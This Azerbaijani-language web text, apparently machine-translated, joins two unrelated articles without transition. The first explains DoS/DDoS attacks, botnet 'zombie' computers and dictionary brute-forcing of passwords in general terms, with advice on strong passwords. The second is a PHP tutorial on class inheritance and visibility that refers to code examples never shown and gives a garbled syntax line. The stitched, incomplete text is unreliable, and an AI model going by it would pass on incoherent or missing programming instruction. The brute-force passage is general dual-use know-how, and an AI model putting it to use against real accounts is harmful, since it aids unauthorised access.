DoS ağıllı şəkildə hazırlanmış bir hücumdur. Məsələn, əgər server daxil olan paketlərin düzgünlüyünü yoxlamazsa, o zaman haker emalı sonsuza qədər davam edəcək sorğu verə bilər və digər bağlantılarla işləmək üçün kifayət qədər prosessor vaxtı olmayacaq. Müvafiq olaraq, müştərilər xidmətdən imtina edəcəklər. Amma böyük tanınmış saytları bu şəkildə yükləmək və ya söndürmək mümkün olmayacaq. Onlar kifayət qədər geniş kanallar və heç bir problem olmadan belə həddindən artıq yüklənmənin öhdəsindən gələ biləcək super güclü serverlərlə silahlanmışdırlar.

DDoS əslində DoS ilə eyni hücumdur. Ancaq DoS-də bir sorğu paketi varsa, DDoS-da yüzlərlə və ya daha çox ola bilər. Hətta super güclü serverlər belə həddindən artıq yüklənmənin öhdəsindən gələ bilməyəcəklər. Sizə bir misal deyim.

DoS hücumu, kiminləsə söhbət edərkən, lakin sonra hansısa tərbiyəsiz bir adam gəlib yüksək səslə qışqırmağa başlayır. Danışmaq ya qeyri-mümkündür, ya da çox çətindir. Həll yolu: mühafizə xidmətinə zəng edin, kim sakitləşdirəcək və şəxsi binadan çıxaracaq. DDoS hücumları minlərlə bu cür tərbiyəsiz insanların izdihamının içəri girməsidir. Belə olan halda mühafizə hamını bağlayıb apara bilməyəcək.

DoS və DDoS zombi adlanan kompüterlərdən həyata keçirilir. Bunlar, maşınının hər hansı bir serverə hücumda iştirak etdiyindən belə şübhələnməyən hakerlər tərəfindən sındırılmış istifadəçilərin kompüterləridir.

Özünüzü bundan necə qorumalısınız? Ümumiyyətlə, yol yoxdur. Ancaq bir haker üçün işləri daha da çətinləşdirə bilərsiniz. Bunun üçün güclü serverlərə malik yaxşı hostinq seçmək lazımdır.

Tərtibatçı çoxlu hücumdan qorunma sistemləri icad edə bilər, yazdığımız skriptləri tam nəzərdən keçirə bilər, saytı zəifliklərə görə yoxlaya bilər və s. Lakin o, veb-sayt tərtibatının son mərhələsinə çatdıqda, yəni admin panelinə sadəcə parol qoyanda bir şeyi unuda bilər. Parol!

Sadə parol təyin etmək qətiyyən tövsiyə edilmir. Bu, 12345, 1114457, vasya111 və s. ola bilər. 10-11 simvoldan az parol təyin etmək tövsiyə edilmir. Əks təqdirdə, ən çox yayılmış və mürəkkəb olmayan hücuma məruz qala bilərsiniz - Brute force.

Brute force xüsusi proqramlardan istifadə edərək lüğət parol axtarışı hücumudur. Lüğətlər müxtəlif ola bilər: Latın, rəqəmlərlə sadalama, məsələn, müəyyən diapazona qədər, qarışıq (latın + rəqəmlər) və hətta unikal simvolları olan lüğətlər var @#4$%&*~~`’”\ ? və s.

Əlbəttə ki, bu cür hücumların qarşısını almaq asandır. Hətta captcha sizi xilas edə bilər. Həmçinin, əgər saytınız CMS-də hazırlanıbsa, o zaman onların çoxu bu tip hücumları aşkarlayır və IP-ni bloklayır. Həmişə yadda saxlamalısınız ki, parolda nə qədər fərqli simvol varsa, onu təxmin etmək bir o qədər çətindir.

Hakerlər necə işləyir? Əksər hallarda onlar ya parolun bir hissəsini əvvəlcədən bilirlər, ya da şübhələnirlər. İstifadəçinin parolunun 3 və ya 5 simvoldan ibarət olmayacağını güman etmək olduqca məntiqlidir. Bu cür parollar tez-tez haker hücumlarına səbəb olur. Əsasən, hakerlər 5-10 simvol aralığı götürür və əvvəlcədən bildikləri bir neçə simvol əlavə edirlər. Sonra, tələb olunan diapazonlu parollar yaradılır. Kali Linux paylamasında belə hallar üçün proqramlar var. Və voila, hücum artıq uzun sürməyəcək, çünki lüğətin həcmi artıq o qədər də böyük deyil. Bundan əlavə, haker video kartın gücündən istifadə edə bilər. Bəziləri CUDA sistemini dəstəkləyir və axtarış sürəti 10 dəfəyə qədər artır. İndi isə belə sadə şəkildə hücumun olduqca real olduğunu görürük. Ancaq kobud gücə məruz qalan yalnız veb saytlar deyil.

Hörmətli tərtibatçılar, informasiya təhlükəsizliyi sistemini heç vaxt unutmayın, çünki bu gün bir çox insanlar, o cümlədən dövlətlər belə hücumlardan əziyyət çəkirlər. Axı, ən böyük zəiflik həmişə bir yerdə diqqətini yayındıra bilən və ya bir şeyi əldən verə bilən bir insandır. Biz proqramçıyıq, lakin proqramlaşdırılmış maşınlar deyilik. Həmişə ehtiyatlı olun, çünki məlumatın itirilməsi ciddi nəticələrə səbəb ola bilər!

Miras, mövcud (valideyn) əsasında yeni sinfi təsvir etməyə imkan verən obyekt yönümlü proqramlaşdırma mexanizmidir.

Başqasından miras alınmaqla əldə edilən sinfə alt sinif deyilir. Bu əlaqə adətən "valideyn" və "uşaq" terminləri ilə təsvir olunur. Uşaq sinfi valideyndən yaranır və onun xüsusiyyətlərini miras alır: xassələri və metodları. Tipik olaraq, alt sinif ana sinfin (həmçinin supersinif adlanır) funksionallığına yeni funksionallıq əlavə edir.

Alt sinif yaratmaq üçün sinif bəyannaməsində genişletilmiş açar sözündən istifadə etməlisiniz, sonra miras aldığınız sinfin adını qeyd etməlisiniz:

Alt sinif ana sinifin bütün metodlarına və xassələrinə girişi miras alır, çünki onlar public tiplidir. Bu o deməkdir ki, my_Cat sinfinin nümunələri üçün biz add_age() metodunu çağıra və $age xassəsinə daxil ola bilərik, baxmayaraq ki, onlar cat sinfində müəyyən edilmişdir. Həmçinin yuxarıdakı nümunədə alt sinifin öz konstruktoru yoxdur. Əgər alt sinif öz konstruktorunu elan etmirsə, o zaman alt sinfin nümunələrini yaratarkən, supersinif konstruktoru avtomatik olaraq çağırılacaqdır.

Nəzərə alın ki, alt siniflər xassələri və metodları ləğv edə bilər. Alt sinfi təyin etməklə, biz onun nümunəsinin əvvəlcə uşağın, sonra isə ana sinifin xüsusiyyətləri ilə müəyyən edilməsini təmin edirik. Bunu daha yaxşı başa düşmək üçün bir nümunə nəzərdən keçirin:

$kitty->foo() çağırarkən PHP tərcüməçisi my_Cat sinfində belə bir metod tapa bilmir, ona görə də Cat sinfində müəyyən edilmiş bu metodun həyata keçirilməsindən istifadə edilir. Bununla belə, alt sinif öz $age xassəsini müəyyən edir, ona görə də ona $kitty->foo() metodunda daxil olduqda, PHP tərcüməçisi həmin xassəni my_Cat sinfində tapır və ondan istifadə edir.

Arqumentlərin növünü təyin etmək mövzusunu artıq əhatə etdiyimiz üçün, əsas sinif növ kimi göstərilibsə, metodun bütün nəsilləri də istifadə üçün əlçatan olacaq, aşağıdakı nümunəyə baxın:

Biz my_Cat sinfinin nümunəsini Cat tipli obyekt kimi qəbul edə bilərik, yəni. my_Cat tipli obyekti Cat sinfinin foo() metoduna ötürə bilərik və hər şey gözlənildiyi kimi işləyəcək.

Təcrübədə alt siniflərə ana sinif metodlarının funksional imkanlarını genişləndirmək lazım gələ bilər. Supersinif metodlarına üstünlük verməklə funksionallığı genişləndirməklə, alt siniflər əvvəlcə ana sinfin kodunu yerinə yetirmək və sonra əlavə funksionallığı həyata keçirən kodu əlavə etmək qabiliyyətini saxlayırlar. Bunun necə edilə biləcəyinə baxaq.

Ana sinifdən istədiyiniz metodu çağırmaq üçün siz bu sinfin özünə deskriptor vasitəsilə daxil olmalısınız. PHP bu məqsəd üçün ana açar sözü təmin edir. Ana operator alt siniflərə ana sinfin metodlarına (və konstruktorlarına) daxil olmaq və mövcud funksionallıqlarına əlavə etmək imkanı verir. Sinif kontekstində metoda istinad etmək üçün "::" (iki iki nöqtə) simvollarından istifadə edin. Əsas operator sintaksisi:

Parent::parent_class metodu

Bu konstruksiya superclassda müəyyən edilmiş metodu çağıracaq. Belə bir çağırışdan sonra siz yeni funksionallıq əlavə edəcək proqram kodunuzu yerləşdirə bilərsiniz:

Uşaq sinif öz konstruktorunu təyin etdikdə, PHP avtomatik olaraq ana sinifin konstruktorunu çağırmır. Bu, alt sinif konstruktorunda əl ilə edilməlidir. Alt sinif əvvəlcə öz konstruktorunda ana sinfinin konstruktorunu çağırır, inisializasiya üçün lazımi arqumentləri ötürür, onu icra edir və sonra əlavə funksionallığı həyata keçirən kodu yerinə yetirir, bu halda alt sinfin xassəsini işə salır.

Ana açar söz yalnız konstruktorlarda deyil, həm də funksionallığını genişləndirmək istədiyiniz hər hansı digər metodda istifadə edilə bilər, buna ana sinifin metodunu çağırmaqla nail olmaq olar:

Burada ilk olaraq supersinifdən getstr() metodu çağırılır, onun dəyəri dəyişənə təyin edilir və bundan sonra alt sinif metodunda müəyyən edilmiş kodun qalan hissəsi yerinə yetirilir.

İndi biz mirasın əsaslarını əhatə etdikdən sonra, nəhayət, xassələrin və metodların görünməsi məsələsinə baxa bilərik.

Bu vaxta qədər biz bütün əmlakları açıq şəkildə açıq elan etmişik. Və bu cür giriş bütün üsullar üçün standart olaraq təyin edilir.

Bir sinfin üzvləri ictimai, qorunan və ya özəl olaraq elan edilə bilər. Onların arasındakı fərqə baxaq:

• İctimai xassələrə və metodlara istənilən kontekstdən daxil olmaq olar.
• Qorunan xüsusiyyətlərə və metodlara ya ehtiva edən sinifdən, ya da onun alt sinifindən daxil olmaq olar. Heç bir xarici kodun onlara daxil olmasına icazə verilmir.
• Şəxsi açar sözündən istifadə edərək sinif məlumatlarını zəng edən proqram üçün əlçatmaz edə bilərsiniz. Bu cür xassələrə və metodlara yalnız elan olunduğu sinifdən daxil olmaq olar. Hətta bu sinfin alt siniflərinin belə məlumatlara çıxışı yoxdur.

Qorunan modifikator, çağırış proqramı nöqteyi-nəzərindən özəl ilə tamamilə eyni görünür: kənardan obyektin məlumatlarına girişi qadağan edir. Bununla belə, özəldən fərqli olaraq, bu, yalnız sinifinizin metodlarından deyil, həm də alt sinifin metodlarından məlumat əldə etməyə imkan verir.